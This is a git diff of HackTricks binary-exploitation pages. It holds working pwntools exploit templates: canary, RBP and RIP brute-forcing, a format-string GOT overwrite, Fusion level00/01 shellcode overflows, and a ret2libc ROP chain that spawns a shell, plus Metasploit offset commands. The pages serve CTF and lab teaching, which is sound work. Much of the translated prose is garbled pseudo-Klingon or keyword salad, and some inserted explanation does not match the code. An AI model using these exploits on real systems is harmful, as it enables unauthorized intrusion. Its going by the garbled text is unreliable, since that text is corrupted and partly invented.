Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.\ **ghobe'}'e'** **tactic** **restricted** **attacker** **print** **content** **payload** **exfiltrate canary** **create new payload** (in **same program session**) **send** **real buffer overflow**.\
CTF example: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html) CTF example: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html)
# PIE # PIE
In order to bypass the PIE you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\ **PIE** **bypass** **leak some address** **need**. **binary** **leaking any addresses** **best** **brute-force RBP and RIP saved stack** **vulnerable function**.\
For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.** **example**, **binary** **protected** **canary** **PIE**, **brute-forcing canary**, **next** 8 Bytes (x64) **saved RBP** **next** 8 Bytes **saved RIP**.
To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP:
**brute-force RBP** **RIP** **binary** **figure out** **valid guessed byte** **correct** **program output something** **just doesn't crash**. **same function** **provided brute-forcing canary** **used** **brute-force RBP** **RIP**:
```python ```python
print("Brute-Forcing RBP") print("Brute-Forcing RBP")
base_canary_rbp = get_bf(base_canary) base_canary_rbp = get_bf(base_canary)
@ -144,32 +141,26 @@ print("Brute-Forcing RIP")
base_canary_rbp_rip = get_bf(base_canary_rbp) base_canary_rbp_rip = get_bf(base_canary_rbp)
RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:]) RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])
``` ```
## Get base address ## Get base address
The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**. **leaked** addresses: the **RBP** and the **RIP**.
From the **RBP** you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00"_ inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP** an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP:
**RBP** **useful addresses** **calculate** **shell stack**. _"/bin/sh\x00"_ **stack**. **distance** **leaked RBP** **shellcode located**, **distance** **shellcode** **RBP**:
```python ```python
INI_SHELLCODE = RBP - 1152 INI_SHELLCODE = RBP - 1152
``` ```
**RIP**-lI' vItlhutlh **PIE binary**-lI' **base address**-lI' jImej. **valid ROP chain**-lI' tlhInganpu' vItlhutlh.\
From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.\ **base address**-lI' jImej **objdump -d vunbinary**-lI' jatlh je. **disassemble latest addresses**-lI' qar'a' jImej:
To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses:
![](<../../.gitbook/assets/image (145).png>) ![](<../../.gitbook/assets/image (145).png>)
In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked _0x562002970**ecf** _ the base address is _0x562002970**000**_ DaH jatlhpu'wI'chaj, **1 Byte 'ej 'ejvatlh**-lI' vItlhutlh, vaj, **leaked RIP but finishing on "000"**-lI' jImej. jatlhpu'wI'chaj _0x562002970**ecf** _ leaked vaj _0x562002970**000**_-lI' jImej.
```python ```python
elf.address = RIP - (RIP & 0xfff) elf.address = RIP - (RIP & 0xfff)
``` ```
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlh wa'logh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -180,5 +171,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -1,8 +1,6 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -13,8 +11,6 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
```python ```python
from pwn import * from pwn import *
from time import sleep from time import sleep
@ -49,23 +45,23 @@ print(" ====================== ")
def connect_binary(): def connect_binary():
global P, ELF_LOADED, ROP_LOADED global P, ELF_LOADED, ROP_LOADED
if LOCAL: if LOCAL:
P = process(LOCAL_BIN) # start the vuln binary P = process(LOCAL_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTETTCP: elif REMOTETTCP:
P = remote('10.10.10.10',1338) # start the vuln binary P = remote('10.10.10.10',1338) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTESSH: elif REMOTESSH:
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
P = ssh_shell.process(REMOTE_BIN) # start the vuln binary P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(elf)# Find ROP gadgets ROP_LOADED = ROP(elf)# Find ROP gadgets
####################################### #######################################
@ -73,39 +69,39 @@ def connect_binary():
####################################### #######################################
def send_payload(payload): def send_payload(payload):
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
log.info("payload = %s" % repr(payload)) log.info("payload = %s" % repr(payload))
if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED") if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
P.sendline(payload) P.sendline(payload)
sleep(0.5) sleep(0.5)
return P.recv() return P.recv()
def get_formatstring_config(): def get_formatstring_config():
global P global P
for offset in range(1,1000): for offset in range(1,1000):
connect_binary() connect_binary()
P.clean() P.clean()
payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p" payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip() recieved = send_payload(payload).strip()
if b"41" in recieved: if b"41" in recieved:
for padlen in range(0,4): for padlen in range(0,4):
if b"41414141" in recieved: if b"41414141" in recieved:
connect_binary() connect_binary()
payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p" payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip() recieved = send_payload(payload).strip()
print(recieved) print(recieved)
if b"42424242" in recieved: if b"42424242" in recieved:
log.info(f"Found offset ({offset}) and padlen ({padlen})") log.info(f"Found offset ({offset}) and padlen ({padlen})")
return offset, padlen return offset, padlen
else: else:
connect_binary() connect_binary()
payload = b" " + payload payload = b" " + payload
recieved = send_payload(payload).strip() recieved = send_payload(payload).strip()
# In order to exploit a format string you need to find a position where part of your payload # In order to exploit a format string you need to find a position where part of your payload
@ -138,10 +134,10 @@ log.info(f"Printf GOT address: {hex(P_GOT)}")
connect_binary() connect_binary()
if GDB and not REMOTETTCP and not REMOTESSH: if GDB and not REMOTETTCP and not REMOTESSH:
# attach gdb and continue # attach gdb and continue
# You can set breakpoints, for example "break *main" # You can set breakpoints, for example "break *main"
gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n" gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n"
sleep(5) sleep(5)
format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES) format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES)
#format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR) #format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR)
@ -153,12 +149,9 @@ format_string.execute_writes()
P.interactive() P.interactive()
``` ```
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -169,5 +162,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -1,5 +1,3 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -19,9 +17,8 @@ Other ways to support HackTricks:
[http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/) [http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/)
1. Get offset to modify EIP 1. **EIP**'e qarar vermək üçün ofseti əldə edin.
2. Put shellcode address in EIP 2. Shellcode ünvanını **EIP**-ə qoyun.
```python ```python
from pwn import * from pwn import *
@ -47,9 +44,30 @@ r.recvline()
r.send(buf) r.send(buf)
r.interactive() r.interactive()
``` ```
# Level01 # Level01
## Information
The **Level01** challenge is a basic exploitation exercise that focuses on exploiting a vulnerable binary file called **fusion**. The goal is to gain unauthorized access to the **Level01** user's account.
## Exploitation
To exploit the **fusion** binary, we need to understand its vulnerability. By running the **checksec** command, we can determine that the binary has no stack canaries, NX protection is disabled, and ASLR is enabled.
Next, we can use the **strings** command to analyze the binary and identify any potential vulnerabilities. In this case, we find that the binary uses the **gets** function, which is known to be vulnerable to buffer overflow attacks.
To exploit this vulnerability, we can create a payload that overflows the buffer and overwrites the return address with the address of the **win** function. This function will grant us access to the **Level01** user's account.
## Solution
To solve the **Level01** challenge, follow these steps:
1. Run the **fusion** binary.
2. Input a string that is longer than the buffer size to trigger the buffer overflow.
3. Overwrite the return address with the address of the **win** function.
4. Gain unauthorized access to the **Level01** user's account.
Remember to always exercise caution and only perform these actions in controlled environments with proper authorization.
```python ```python
from pwn import * from pwn import *
@ -75,12 +93,9 @@ buf += "\x65\xd9\x0f\x01"
r.send(buf) r.send(buf)
r.interactive() r.interactive()
``` ```
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -91,5 +106,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View file

@ -1,8 +1,6 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -35,25 +33,25 @@ LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
ENV = {"LD_PRELOAD": LIBC} if LIBC else {} ENV = {"LD_PRELOAD": LIBC} if LIBC else {}
if LOCAL: if LOCAL:
P = process(LOCAL_BIN, env=ENV) # start the vuln binary P = process(LOCAL_BIN, env=ENV) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTETTCP: elif REMOTETTCP:
P = remote('10.10.10.10',1339) # start the vuln binary P = remote('10.10.10.10',1339) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTESSH: elif REMOTESSH:
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
p = ssh_shell.process(REMOTE_BIN) # start the vuln binary p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
elf = ELF(LOCAL_BIN)# Extract data from binary elf = ELF(LOCAL_BIN)# Extract data from binary
rop = ROP(elf)# Find ROP gadgets rop = ROP(elf)# Find ROP gadgets
if GDB and not REMOTETTCP and not REMOTESSH: if GDB and not REMOTETTCP and not REMOTESSH:
# attach gdb and continue # attach gdb and continue
# You can set breakpoints, for example "break *main" # You can set breakpoints, for example "break *main"
gdb.attach(P.pid, "b *main") gdb.attach(P.pid, "b *main")
@ -63,15 +61,15 @@ if GDB and not REMOTETTCP and not REMOTESSH:
OFFSET = b"" #b"A"*264 OFFSET = b"" #b"A"*264
if OFFSET == b"": if OFFSET == b"":
gdb.attach(P.pid, "c") #Attach and continue gdb.attach(P.pid, "c") #Attach and continue
payload = cyclic(264) payload = cyclic(264)
payload += b"AAAAAAAA" payload += b"AAAAAAAA"
print(P.clean()) print(P.clean())
P.sendline(payload) P.sendline(payload)
#x/wx $rsp -- Search for bytes that crashed the application #x/wx $rsp -- Search for bytes that crashed the application
#print(cyclic_find(0x63616171)) # Find the offset of those bytes #print(cyclic_find(0x63616171)) # Find the offset of those bytes
P.interactive() P.interactive()
exit() exit()
@ -79,11 +77,11 @@ if OFFSET == b"":
### Find Gadgets ### ### Find Gadgets ###
#################### ####################
try: try:
libc_func = "puts" libc_func = "puts"
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
except: except:
libc_func = "printf" libc_func = "printf"
PUTS_PLT = ELF_LOADED.plt['printf'] PUTS_PLT = ELF_LOADED.plt['printf']
MAIN_PLT = ELF_LOADED.symbols['main'] MAIN_PLT = ELF_LOADED.symbols['main']
POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi" POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
@ -100,54 +98,54 @@ log.info("ret gadget: " + hex(RET))
######################## ########################
def generate_payload_aligned(rop): def generate_payload_aligned(rop):
payload1 = OFFSET + rop payload1 = OFFSET + rop
if (len(payload1) % 16) == 0: if (len(payload1) % 16) == 0:
return payload1 return payload1
else: else:
payload2 = OFFSET + p64(RET) + rop payload2 = OFFSET + p64(RET) + rop
if (len(payload2) % 16) == 0: if (len(payload2) % 16) == 0:
log.info("Payload aligned successfully") log.info("Payload aligned successfully")
return payload2 return payload2
else: else:
log.warning(f"I couldn't align the payload! Len: {len(payload1)}") log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
return payload1 return payload1
def get_addr(libc_func): def get_addr(libc_func):
FUNC_GOT = ELF_LOADED.got[libc_func] FUNC_GOT = ELF_LOADED.got[libc_func]
log.info(libc_func + " GOT @ " + hex(FUNC_GOT)) log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
# Create rop chain # Create rop chain
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
rop1 = generate_payload_aligned(rop1) rop1 = generate_payload_aligned(rop1)
# Send our rop-chain payload # Send our rop-chain payload
#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received #P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received
print(P.clean()) # clean socket buffer (read all and print) print(P.clean()) # clean socket buffer (read all and print)
P.sendline(rop1) P.sendline(rop1)
# If binary is echoing back the payload, remove that message # If binary is echoing back the payload, remove that message
recieved = P.recvline().strip() recieved = P.recvline().strip()
if OFFSET[:30] in recieved: if OFFSET[:30] in recieved:
recieved = P.recvline().strip() recieved = P.recvline().strip()
# Parse leaked address # Parse leaked address
log.info(f"Len rop1: {len(rop1)}") log.info(f"Len rop1: {len(rop1)}")
leak = u64(recieved.ljust(8, b"\x00")) leak = u64(recieved.ljust(8, b"\x00"))
log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}") log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
# Set lib base address # Set lib base address
if LIBC: if LIBC:
LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
print("If LIBC base doesn't end end 00, you might be using an icorrect libc library") print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
log.info("LIBC base @ %s" % hex(LIBC.address)) log.info("LIBC base @ %s" % hex(LIBC.address))
# If not LIBC yet, stop here # If not LIBC yet, stop here
else: else:
print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)") print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
P.interactive() P.interactive()
return hex(leak) return hex(leak)
get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
@ -160,38 +158,38 @@ get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
## Via One_gadget (https://github.com/david942j/one_gadget) ## Via One_gadget (https://github.com/david942j/one_gadget)
# gem install one_gadget # gem install one_gadget
def get_one_gadgets(libc): def get_one_gadgets(libc):
import string, subprocess import string, subprocess
args = ["one_gadget", "-r"] args = ["one_gadget", "-r"]
if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()): if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
args += ["-b", libc.hex()] args += ["-b", libc.hex()]
else: else:
args += [libc] args += [libc]
try: try:
one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()] one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
except: except:
print("One_gadget isn't installed") print("One_gadget isn't installed")
one_gadgets = [] one_gadgets = []
return return
rop2 = b"" rop2 = b""
if USE_ONE_GADGET: if USE_ONE_GADGET:
one_gadgets = get_one_gadgets(LIBC) one_gadgets = get_one_gadgets(LIBC)
if one_gadgets: if one_gadgets:
rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
## Normal/Long exploitation ## Normal/Long exploitation
if not rop2: if not rop2:
BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
SYSTEM = LIBC.sym["system"] SYSTEM = LIBC.sym["system"]
EXIT = LIBC.sym["exit"] EXIT = LIBC.sym["exit"]
log.info("POP_RDI %s " % hex(POP_RDI)) log.info("POP_RDI %s " % hex(POP_RDI))
log.info("bin/sh %s " % hex(BINSH)) log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM)) log.info("system %s " % hex(SYSTEM))
log.info("exit %s " % hex(EXIT)) log.info("exit %s " % hex(EXIT))
rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT) rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
rop2 = generate_payload_aligned(rop2) rop2 = generate_payload_aligned(rop2)
print(P.clean()) print(P.clean())
@ -201,24 +199,20 @@ P.interactive() #Interact with your shell :)
``` ```
{% endcode %} {% endcode %}
# Common problems # tlhIngan mu'qaD
## MAIN\_PLT = elf.symbols\['main'] not found ## MAIN\_PLT = elf.symbols\['main'] not found
If the "main" symbol does not exist. Then you can just where is the main code: qaStaHvIS "main" symbol 'e' vItlhutlh. vaj 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh.
```python ```python
objdump -d vuln_binary | grep "\.text" objdump -d vuln_binary | grep "\.text"
Disassembly of section .text: Disassembly of section .text:
0000000000401080 <.text>: 0000000000401080 <.text>:
``` ```
ghItlh 'ej manually address set:
and set the address manually:
```python ```python
MAIN_PLT = 0x401080 MAIN_PLT = 0x401080
``` ```
## Puts not found ## Puts not found
If the binary is not using Puts you should check if it is using If the binary is not using Puts you should check if it is using
@ -228,15 +222,12 @@ If the binary is not using Puts you should check if it is using
If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found` If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
Try to **subtract 64 bytes to the address of "/bin/sh"**: Try to **subtract 64 bytes to the address of "/bin/sh"**:
```python ```python
BINSH = next(libc.search("/bin/sh")) - 64 BINSH = next(libc.search("/bin/sh")) - 64
``` ```
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -247,5 +238,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

File diff suppressed because one or more lines are too long

View file

@ -1,22 +1,19 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlhlaHbe'chugh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: HackTricks Daq vItlhutlh:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * **HackTricks** vItlhutlh **company advertise** 'ej **HackTricks PDF download** 'oH [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **chek**!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) vItlhutlh
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) vItlhutlh, **exclusive NFTs** [**NFTs**](https://opensea.io/collection/the-peass-family) vItlhutlh
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **join** 'ej [**telegram group**](https://t.me/peass) **join** 'ej **follow** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Hacking tricks** **share** 'e' **submit PRs** [**HackTricks**](https://github.com/carlospolop/hacktricks) 'ej [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
# Metasploit # Metasploit
``` ```
pattern_create.rb -l 3000 #Length pattern_create.rb -l 3000 #Length
pattern_offset.rb -l 3000 -q 5f97d534 #Search offset pattern_offset.rb -l 3000 -q 5f97d534 #Search offset
@ -24,59 +21,92 @@ nasm_shell.rb
nasm> jmp esp #Get opcodes nasm> jmp esp #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01 msfelfscan -j esi /opt/fusion/bin/level01
``` ```
## Shellcodes ## Shellcodes
### What is a Shellcode?
A shellcode is a small piece of code that is used as the payload in an exploit. It is typically written in assembly language and is designed to be injected into a vulnerable program to gain unauthorized access or execute arbitrary commands.
### Creating Shellcodes
There are several tools and techniques available for creating shellcodes. Some popular ones include:
- **Metasploit Framework**: Metasploit is a powerful framework that provides a wide range of tools for creating and exploiting vulnerabilities. It includes a module called `msfvenom` that can be used to generate shellcodes in various formats.
- **Shellcode Compiler**: Shellcode Compiler is a tool that allows you to write shellcodes in high-level programming languages such as C and C++. It then compiles the code into assembly language, making it easier to create complex shellcodes.
- **Custom Shellcode Development**: If you have advanced knowledge of assembly language, you can write your own shellcodes from scratch. This gives you complete control over the functionality and size of the shellcode.
### Shellcode Execution
Once you have created a shellcode, you need a way to execute it on the target system. There are several techniques that can be used for this purpose:
- **Buffer Overflow**: Buffer overflow is a common vulnerability that can be exploited to execute shellcodes. By overflowing a buffer in a vulnerable program, you can overwrite the return address on the stack and redirect the program's execution flow to your shellcode.
- **Return-Oriented Programming (ROP)**: ROP is a technique that allows you to chain together small pieces of code, called gadgets, to create a larger payload. By carefully selecting gadgets from the target program's code, you can construct a ROP chain that eventually leads to the execution of your shellcode.
- **Heap Spraying**: Heap spraying is a technique that involves allocating a large number of objects in the heap and filling them with shellcode. By carefully controlling the layout of the heap, you can increase the chances of the shellcode being executed.
### Shellcode Analysis
Analyzing shellcodes is an important part of the exploit development process. It allows you to understand how the shellcode works and identify any potential weaknesses or anti-analysis techniques. Some popular tools for shellcode analysis include:
- **IDA Pro**: IDA Pro is a powerful disassembler and debugger that can be used to analyze shellcodes. It provides a graphical interface for navigating and analyzing the assembly code, making it easier to understand the shellcode's functionality.
- **GDB**: GDB is a command-line debugger that can be used to analyze shellcodes. It allows you to set breakpoints, step through the code, and inspect the values of registers and memory locations.
- **Online Sandboxes**: Online sandboxes, such as [Cuckoo Sandbox](https://cuckoosandbox.org/) and [Hybrid Analysis](https://www.hybrid-analysis.com/), can be used to execute shellcodes in a controlled environment and monitor their behavior. This can help identify any malicious or suspicious activities.
### Conclusion
Shellcodes are an essential component of exploit development. By understanding how to create, execute, and analyze shellcodes, you can enhance your hacking skills and effectively exploit vulnerabilities.
``` ```
